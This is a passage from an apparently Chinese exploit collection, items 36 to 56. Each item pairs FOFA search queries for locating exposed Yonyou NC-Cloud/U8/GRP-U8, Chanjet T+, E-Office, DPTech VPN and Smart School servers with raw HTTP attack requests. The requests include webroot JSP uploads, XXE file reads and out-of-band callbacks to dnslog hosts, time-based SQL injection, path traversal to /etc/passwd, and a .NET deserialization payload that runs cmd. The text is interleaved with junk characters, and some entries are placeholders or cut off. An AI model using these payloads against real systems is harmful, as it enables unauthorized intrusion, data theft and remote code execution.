POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1- _8 J& B, C$ d8 r4 q9 L
Host: 203.25.218.166:8888
- N" g0 H1 c ~; t+ g; rUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
; L* G: F8 Q$ L$ qAccept-Encoding: gzip, deflate
8 ]$ K/ o/ v) C7 hAccept: */*6 J$ ^+ u0 `4 _" O# w
Connection: close/ Q" [! }6 S8 R4 K' P) F. f
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA& H$ |: k% e! m, B
Content-Length: 1906 s% h# d0 R$ e0 \/ g
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
+ q, A6 F" i& h) d6 _. E5 V4 k8 l7 n( @' j
--fd28cb44e829ed1c197ec3bc71748df0 @0 S/ ^. ^3 o! p) X! R* r
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
) t. F- n! Z% b; W4 k1 V
' B. w0 V5 E1 l7 x! h$ Z' k( r( [<%out.println(1111*1111);%>
7 F- C. h }' K--fd28cb44e829ed1c197ec3bc71748df0--
( ?, l% O" q! r+ q; R
9 s/ J8 F; T8 [* ?/ ?
5 a3 {0 V. r2 R( n1 ?36. 用友NC-Cloud soapFormat XXE
4 H4 |. y. H8 h/ LFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"7 k5 N0 }0 f2 K- n
POST /uapws/soapFormat.ajax HTTP/1.1
) B' O* B: o* X3 T( D" sHost: 192.168.40.130:8989
! c- P$ G* u$ K1 {# L6 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0; y& c, I8 S) P# h* w! v
Content-Length: 263
0 `- C ^2 m- C o; S+ ~& ]# qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; i1 K5 u7 h/ |) Q
Accept-Encoding: gzip, deflate4 H/ C% P% _, J5 R: [5 s+ k/ f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 J W. U8 o5 S" K! M, mConnection: close
" d7 z, P5 d: R* T( R6 E: G% mContent-Type: application/x-www-form-urlencoded$ I g' t- X% b8 F9 A7 a
Upgrade-Insecure-Requests: 1
7 }: @# E$ [, Q" K' m, {0 t" m1 u1 D; {* X& l: l$ g
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
; \& u3 [4 O2 \' ]0 _- Q0 C- d( H7 |# u2 p; E
$ K& S2 p2 U! O6 O6 \. | b# r* c7 @
37. 用友NC-Cloud IUpdateService XXE8 h% |+ U9 j: {! e5 }
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"+ x8 \' a) _) k N. H
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.17 S4 P8 m/ d" k) ?% I
Host: 192.168.40.130:8989
' P( G3 s' H& cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.363 J2 Q, I) A$ V
Content-Length: 421
' r. s ]$ W" r DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9# N6 R! L2 t! d7 l) M
Accept-Encoding: gzip, deflate
, h6 p9 F) ` r1 h8 s3 D# P: iAccept-Language: zh-CN,zh;q=0.9- W6 W/ g# _1 m
Connection: close3 x) F, S! d. J. ^& n! I
Content-Type: text/xml;charset=UTF-8
* w+ W* e9 \( z/ F1 xSOAPAction: urn:getResult
( X9 v; J) g/ U: K( _8 DUpgrade-Insecure-Requests: 1
' @% o$ @0 G( I* } \9 W1 r$ [' r$ a% v9 `
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">9 r |( l% Z( l7 A/ S2 l3 H* u
<soapenv:Header/>% F# \; M/ M3 u) x& z" z
<soapenv:Body>2 {+ m+ [. S O/ h5 }- i
<iup:getResult>/ e. K3 K' l* [7 H7 \
<!--type: string-->4 b! |6 t1 V* q; R' U; H, o) Z
<iup:string><![CDATA[
0 f+ b: u6 ]4 r. F+ M- P. w7 p<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>" C+ c7 r# a0 y7 O4 }" B
<xxx/>]]></iup:string>
* }/ [5 D. i3 \1 K</iup:getResult>! z, F. B9 `( o4 g, m7 M
</soapenv:Body>* ?5 s; n+ T5 U* x& [; N/ T2 S9 O! |
</soapenv:Envelope>
0 e2 T8 K' f( n8 h4 F9 H3 z
3 r- D1 r/ w, s9 L( k
; I* a R& E* C2 N* ?% G2 |+ m+ `
]- @- k) G" v2 @ G+ B38. 用友U8 Cloud smartweb2.RPC.d XXE& z$ |0 e/ D0 ]0 M# o
FOFA:app="用友-U8-Cloud"
4 w/ d g- Q/ O9 e6 Y/ @: U6 uPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
+ j6 w; n' |$ x2 R3 x, IHost: 192.168.40.131:8088! z' _* E: n0 G! F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.258 _8 W$ I7 p' w3 ]2 L6 W: o
Content-Length: 260+ h- B$ f ^( T! `& T @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
0 J) |/ R# r$ { Z" @: J' VAccept-Encoding: gzip, deflate
0 |3 r: p, j! a9 X$ G6 rAccept-Language: zh-CN,zh;q=0.9 [; m3 }' }! D% s* M# L
Connection: close
" s4 S0 d3 ~! K9 mContent-Type: application/x-www-form-urlencoded
8 @/ ~* z! t& q* ?) D, [$ k
2 O8 \9 V1 q) D p5 Y5 {% O__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>( k* k7 e" L4 ~" ]8 I" `
) I+ Z) x6 F3 b# G- `1 e
. H" `/ T! E' @8 L
39. 用友U8 Cloud RegisterServlet SQL注入9 j% }, \/ Z0 p9 X9 e6 u# T4 v
FOFA:title="u8c"
; t6 w$ l* t3 G0 `/ YPOST /servlet/RegisterServlet HTTP/1.1# L1 @( X; b) o
Host: 192.168.86.128:8089
) q9 Z- N$ q: B# R5 {3 yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
; }# ], p4 S- CConnection: close4 ~# J( ^. c. { U% {- B) }
Content-Length: 855 ]3 i( F5 P( F) ]0 }
Accept: */*
, C$ ~. l$ P; Q" \5 AAccept-Language: en* Y3 F& ~7 s1 {1 U% [
Content-Type: application/x-www-form-urlencoded5 Q( A8 M5 b" C& v
X-Forwarded-For: 127.0.0.1
/ W6 [! w5 K9 B+ uAccept-Encoding: gzip
4 ]) {' Q. X% o, g. h
( i* Q7 {$ G1 [. Xusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
" N) w0 I& u9 b( N4 `* M' L
0 s2 [: M5 ]6 O: o/ J) T$ F7 f/ s. c( k' N# i5 u# b8 |
40. 用友U8-Cloud XChangeServlet XXE
/ Y+ R# s2 Q! }0 H* ]: V$ eFOFA:app="用友-U8-Cloud"
" c& s* L& C0 v/ f `2 w7 }POST /service/XChangeServlet HTTP/1.1
3 ~' }: X# a7 XHost: x.x.x.x
$ C/ p& _# O4 a; R% K" z! JUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Q n: Z! H c% z: \Content-Type: text/xml. ], m( r x) z$ @+ ^, i
Connection: close
0 b6 y9 i1 S! B0 l {( k% \8 U: s$ g- k' r6 V) Z' y: u
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
) x( Z( p3 ^: Y& k0 W! ]- `* V X+ x' S0 [
4 K7 Q8 S& Y. G3 K- h) a1 O& z41. 用友U8 Cloud MeasureQueryByToolAction SQL注入, K0 Z% D( x6 t% L; Y8 ^6 `5 ], Y
FOFA:app="用友-U8-Cloud"
9 w4 b4 @) g; n! |8 h4 v4 oGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1: S* P/ O) h7 R" m, s
Host:
/ i A4 H& k& W$ NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& K; u1 V: N! ~$ n7 KContent-Type: application/json: H; J* `) y! w1 W* i: O
Accept-Encoding: gzip
5 M7 P @$ D, Y6 V( D( p% pConnection: close
6 a. D6 e2 g0 F* X+ {$ Q
/ k" Q; c4 C3 q) K: e7 V9 c8 _- d! C" ]3 c/ W) a0 l/ J" |
42. 用友GRP-U8 SmartUpload01 文件上传/ R2 Z# s3 o i" e {+ s2 y1 E
FOFA:app="用友-GRP-U8"
5 {& R3 _9 V+ S( N# lPOST /u8qx/SmartUpload01.jsp HTTP/1.1
! A7 G! b# ?$ y9 w; ]6 K/ r6 ]Host: x.x.x.x; G- ], |8 g' V! v1 e
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
7 S/ q3 L( F- V, O$ L" U uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36( g1 Z: M! D& E" v
. |% ~0 E) l+ [/ x, p9 l
PAYLOAD
, q( r7 w$ ]7 y+ \' b/ e: S
. d, `9 [3 Z X- p+ q- h+ Q- }$ L$ t, v6 u
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
0 p$ D8 d1 x1 [) O& d/ m6 o% p, o! t; p) X. l7 r
43. 用友GRP-U8 userInfoWeb SQL注入致RCE; U* X" \1 h. S( w/ y' u+ g: l
FOFA:app="用友-GRP-U8"
+ m4 g" U5 h# G8 y2 hPOST /services/userInfoWeb HTTP/1.1
2 Y. u" u4 Z. j' |/ pHost: your-ip
. F1 [* f C2 \# x, t' m; V; l* |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 K; [ A% H6 P! K; KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 ?7 e' B8 I# X. |3 ]
Accept-Encoding: gzip, deflate) i; J* X% s# R9 p2 V" Q
Accept-Language: zh-CN,zh;q=0.9
* _5 z h0 q, BConnection: close9 l$ N/ i# W# H; Q* E4 L
SOAPAction:( M0 e! z3 \) y; Z* B- j
Content-Type: text/xml;charset=UTF-8: b5 {* L* Y/ E P* F2 L
8 F% Z2 e. A5 X% ^, I7 u+ b<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
( _) H. {0 t& D& h7 \' m <soapenv:Header/>. Y: F& V2 o+ z; i2 D
<soapenv:Body>
+ q: g. t, y) {. a <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">: r2 E. N/ K( c, Z: L2 O* d5 n' {
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
% I6 i4 n8 R" }5 @ </ser:getUserNameById>0 Q- s! O! |: r5 I6 |, r+ G
</soapenv:Body>
2 G) A/ r+ V f) U</soapenv:Envelope>
1 g( H/ y. F+ L6 O- \; L: R! S& I8 p2 V1 a6 r2 b1 U% O0 q6 K4 W. S
8 h2 z- D2 p4 I' }3 g8 s8 Y44. 用友GRP-U8 bx_dj_check.jsp SQL注入+ Q' p+ y% k2 U+ \( B6 `" q, M
FOFA:app="用友-GRP-U8"
& T$ U( s$ ] ~GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1 A3 c) w: R1 L
Host: your-ip
& w& }+ S$ @4 tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
: X% `% J0 m% p8 S; o2 R/ T6 Z# `; @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& u% N6 [- [: ^3 `4 |
Accept-Encoding: gzip, deflate
1 b$ L& _/ ^9 }' v, ?! P+ TAccept-Language: zh-CN,zh;q=0.9
' j) D, e3 _; p, q7 IConnection: close
0 U; E4 {* r/ f
3 B% n% B- m) m* `9 f$ G$ ^2 T- y+ @7 H$ z4 V! X, ]. ?% k
45. 用友GRP-U8 ufgovbank XXE
( J, d( @& l5 t9 ] R4 n' b, _FOFA:app="用友-GRP-U8"
/ u2 Q) H$ X8 \% e$ X( ePOST /ufgovbank HTTP/1.15 t; A1 y; k5 q# t/ M7 e6 h
Host: 192.168.40.130:222+ `& z4 \! [! m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0. I( L. K$ s6 b2 M$ J. e: C. e H
Connection: close' L9 Q' m4 w( y: Z' H v8 N
Content-Length: 161
! h7 m7 S. J4 mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. _3 Z" ~5 a' g6 Y0 z5 C8 w; x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, l2 z$ Q& Z, kContent-Type: application/x-www-form-urlencoded+ u2 E! {/ l @6 ~+ B
Accept-Encoding: gzip
; I. V3 U1 v U6 w2 B% _; f/ c1 W
0 [' |# A+ s2 ~' v% p/ j; T" lreqData=<?xml version="1.0"?>$ A7 B# m6 W' N, p5 ?
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest7 c- Q" w; f2 u6 O; G7 w8 n4 N4 e0 L
& w' F( N$ U1 h- R0 K
$ K; D5 o% ]5 u
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
" y$ F, K* E3 R' Z3 b# }FOFA:app="用友-GRP-U8"" } j$ i9 N& W- I8 E
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
1 N e2 s8 n& z7 K4 zHost: your-ip ^" R( O: R) i- Z' A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36! O4 [+ y& U$ A7 n; W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 x0 U8 T+ F# U' YAccept-Encoding: gzip, deflate
3 k: O, H5 d, x" V' D! S6 f; mAccept-Language: zh-CN,zh;q=0.9
, G& k* ~- R3 Q) }" U3 C$ T" AConnection: close
" I- O9 `# Y. O% n/ c0 Q, C
1 C2 N6 O. ]/ b N3 \: n
6 g0 Z% H+ a: i9 S* W2 t, l47. 用友GRP A++Cloud 政府财务云 任意文件读取
: y) s0 Q5 C% zFOFA:body="/pf/portal/login/css/fonts/style.css"
% c0 _0 R3 ?" z/ N; tGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
% e6 ?1 U2 H8 T$ a- M; F$ y! hHost: x.x.x.x
4 @2 j: g6 j3 [1 uCache-Control: max-age=0
U! Z2 g7 f& z3 J7 T UUpgrade-Insecure-Requests: 1# f( O% z3 p b1 w) D. {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- {3 b0 s7 t0 |: y! X+ P1 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; Y( U" |$ d% R2 g; I- H, v
Accept-Encoding: gzip, deflate, br
: g! D% Q1 Q8 v, A4 OAccept-Language: zh-CN,zh;q=0.9
4 S! f; p& x2 iIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT2 N7 ]2 K, A6 _3 K/ Y# I
Connection: close
: T6 U% t% i) T/ _- a/ G: v. }' ?6 e1 o
: Z9 _4 I+ W& S+ Y4 S, D* N3 z- k2 B0 q" M
* S; ~& v5 t% w/ u+ H- v
48. 用友U8 CRM swfupload 任意文件上传% K, b* v. ]1 y7 V( d3 d
FOFA:title="用友U8CRM"8 X( F, B [ \
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
" N5 N! Q# z/ }Host: your-ip! j, _3 ~, O5 v4 O* x, }$ I: L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( }6 g$ x4 a4 V. sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* E' O9 B9 J1 t( v% b9 sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) \# x8 t0 z* _Accept-Encoding: gzip, deflate5 ^* }- g0 H; }& F) g
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
h) e4 T1 [. }: n. @------269520967239406871642430066855 v( _$ |0 s; i. I# Q( ]2 l7 q
Content-Disposition: form-data; name="file"; filename="s.php"
6 g9 y7 x5 I( y+ E4 Y5 O1231
o5 P" b" a& o o8 C! p; SContent-Type: application/octet-stream) u" B" L8 _; O, l
------269520967239406871642430066855$ w6 y4 V1 I/ f. g
Content-Disposition: form-data; name="upload"# Q- h1 n1 h5 y& h
upload
4 R( W. a; R, q( o------269520967239406871642430066855--
3 K# z h. I/ i% L$ r# E" b. q! f4 j/ t$ d; R3 i/ [: `
& [& I1 u: z) c# a+ ?3 d" K
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
2 N/ n3 F2 E2 n8 P0 Q9 AFOFA:body="用友U8CRM"( I* t, T3 ^( w2 R8 N" S3 J. `0 n
k4 C( u1 _; B. d$ Y! ~* pPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
7 {3 `9 ~8 @4 }3 |& V5 t; s# EHost: x.x.x.x
4 h5 D1 W$ i7 M+ `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.07 g3 w: R) ]( \! G
Content-Length: 329; G p0 k! I& V7 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 t# U! X* T. P( z4 o) J) c' d9 L8 u
Accept-Encoding: gzip, deflate
6 K+ V! L8 h# O3 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, X6 {: T' c9 g9 m% q, O( Y( V& r
Connection: close$ P! o y+ V' T: a
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w( K8 m* @* U( z' G [1 {: y
$ A! u4 J( g% J. w, C-----------------------------vvv3wdayqv3yppdxvn3w; v' N) c }$ T6 a/ z
Content-Disposition: form-data; name="file"; filename="%s.php ") G+ q2 B5 I2 O: C) K
Content-Type: application/octet-stream" x: `' h8 p2 C6 p* _) |
# z: d* n" \1 d3 h$ B- F5 N
wersqqmlumloqa
+ t2 x# c* h& d# y-----------------------------vvv3wdayqv3yppdxvn3w' ^" w8 U% r/ ^& `
Content-Disposition: form-data; name="upload"
( @) i B/ H) L2 j2 B
( t% N A* U' U4 c* lupload) B N, y" m6 q
-----------------------------vvv3wdayqv3yppdxvn3w--
1 o8 Y7 S8 W2 {5 P' ], _$ K8 Z( J: v5 o" V2 T" o- l. Z9 }2 G$ A* C
) R) J5 _, J1 {3 e- g
http://x.x.x.x/tmpfile/updB3CB.tmp.php5 k/ C% @) e3 Z }7 q/ i6 g
% D4 g6 D9 g' |6 a- r Z, M* I
50. QDocs Smart School 6.4.1 filterRecords SQL注入6 n5 u3 r) c( ~ r$ T; v
FOFA:body="close closebtnmodal"# w* F3 \, A K- v8 Z/ z
POST /course/filterRecords/ HTTP/1.1
% y& F N$ T% Z# H4 c/ r ^Host: x.x.x.x4 F6 o. B$ Y$ v, \: a
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; D% b. Y( U2 E; c3 p" R
Connection: close
: |1 g- p/ J0 u, f% I& H7 nContent-Length: 224
6 P, }. A" q6 c/ n4 t1 YAccept: */*5 H; z& ^ I% u1 i
Accept-Language: en* ]8 q0 ]% {# h! z1 }7 V
Content-Type: application/x-www-form-urlencoded
$ }: D$ X f4 t( V+ o4 A. \8 [) r. Z4 eAccept-Encoding: gzip
1 D: z6 V* E! E' w/ {4 ]* J3 X- |$ C2 k/ \2 B/ p
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=18 Y: u8 a2 o! O* S2 `6 @
+ U0 Q- ]+ p5 o. Z7 [; T P
( ~" r3 G8 c! \( p. q; x
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
2 q7 ?3 l% ^8 t' u$ |FOFA:app="云时空社会化商业ERP系统"3 _! z( C. \( K
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
+ S( T) S, D/ [6 H9 k7 y& g3 sHost: your-ip
! J) ^$ _: ]. uUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
; ~! i% x3 M$ ]; a3 S5 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.90 l$ X; N" Y5 G3 g& n+ r' ~
Accept-Encoding: gzip, deflate
; z/ z; {- I" c3 z7 `9 s0 jAccept-Language: zh-CN,zh;q=0.9! {2 o; ]+ f) Z% y6 I
Connection: close
/ {+ C. {! G, D
6 t4 [: b- z: J8 z2 Z1 U1 x5 R2 P1 \" n$ {
52. 泛微E-Office json_common.php sql注入 o2 M1 Z U$ o+ ]9 C5 }* L
FOFA:app="泛微-EOffice"
) \1 Y4 x1 e( [2 EPOST /building/json_common.php HTTP/1.12 S4 M2 k$ R9 e1 o; [' W0 o: f. }
Host: 192.168.86.128:8097
/ u: d% r2 s# I2 _. IUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* R- Z8 Y5 w, o5 G2 p# k, A
Connection: close" |1 K: ^% _/ t4 W; k$ i
Content-Length: 87# Q& j8 M ?( R$ f) c, L" T
Accept: */*& b9 i5 ^, e; E& G8 R* J0 |6 \
Accept-Language: en& d" c0 V( y0 H
Content-Type: application/x-www-form-urlencoded( i; R& d- i5 g, C& T3 b0 u# B
Accept-Encoding: gzip/ f/ ^% \# ^8 f4 @
! P2 U' Q4 L F9 n$ }tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
: J7 x- g# P8 u9 K+ Z; q: H
3 ?7 Y. ~, a' Q( G0 s. j* l& e& m; y( X7 e
53. 迪普 DPTech VPN Service 任意文件上传2 Z* d$ X9 Z9 d- X+ r
FOFA:app="DPtech-SSLVPN"
8 g+ l9 u; E/ {6 W, @/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd2 H: O/ v# L/ n1 x
' a E7 b: k5 r7 I. V: i
4 a3 A* y# O' } S, I54. 畅捷通T+ getstorewarehousebystore 远程代码执行
, b& y4 @6 W- L1 MFOFA:app="畅捷通-TPlus"/ ?& G' L/ D3 v5 C, _3 m
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件1 |; l4 z- I% Z; H& j9 P+ h3 D! y
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
# I$ P7 u/ R( L9 t: n4 }
+ c) d7 T& S3 d- K) w: y2 |, M% S1 s0 z* t* _7 i
完整数据包6 w4 |1 f# Z0 y+ [8 F
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
7 [: }; I) l( aHost: x.x.x.x
9 y/ {% j# Y8 I: g8 `User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
7 d4 q0 H, L# ^ G7 k6 [9 e" s- ^5 ~0 gContent-Length: 593+ U3 O7 x6 |4 w, M( ]
^' e6 F* O7 l+ P5 U* Y6 {{5 g. B5 d! r( R
"storeID":{
* ?+ Q: A8 R% ` z( L( w "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",% A! d0 c' D3 |# i% M0 H5 V" H( a0 F" [
"MethodName":"Start",
+ c4 h; y# g. x2 a* \ "ObjectInstance":{
$ |8 [5 K& i1 ], p, a "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% \, d3 t% G& f- q: z: \8 g$ {* H; s
"StartInfo":{, Y/ T& T* U* S- O% n* Q9 I
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* o0 p- g8 P! B5 o; _
"FileName":"cmd",- J( y1 \2 U% y
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
( M" T R* E) C1 R }
' v1 f/ x4 c( p2 i! j }
4 B1 g3 n7 J( e }
. J$ q! H$ p& _( p}$ U) X/ R5 n# l
3 z s$ L2 U% q5 I
5 Z' l1 L ], l: E第二步,访问如下url
# {0 D, E7 g1 m/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt* I1 j' x B. P; `* v
- I. u7 ~ ?& z$ O( U2 |' L- l( O& `
55. 畅捷通T+ getdecallusers信息泄露# H4 y% h3 G' c9 Y3 v/ j/ z' O
FOFA:app="畅捷通-TPlus"
7 ~9 A& v7 w) e1 Y( Y3 I% i第一步,通过9 i: m* k5 |9 l0 }' _: K
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie2 }; N O9 Q2 h+ d( s6 \% Y |
第二步,利用获取到的Cookie请求& e h5 v$ _' ]: |
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers+ Y$ h5 i" V3 D% v' G0 {& g1 A( R: Z
. K; H+ F8 O5 b0 |: W0 O' _% V% _; ?
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE2 T3 K6 P/ a! E1 H& K# n
FOFA: app="畅捷通-TPlus"
6 K! {3 @5 V2 t; Y9 i( ~POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
1 ~2 K! `9 [( z; M! S: I$ \Host: x.x.x.x
) x! B$ Q0 S4 M, y! oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.364 p4 X, B- h# I
Content-Type: application/json
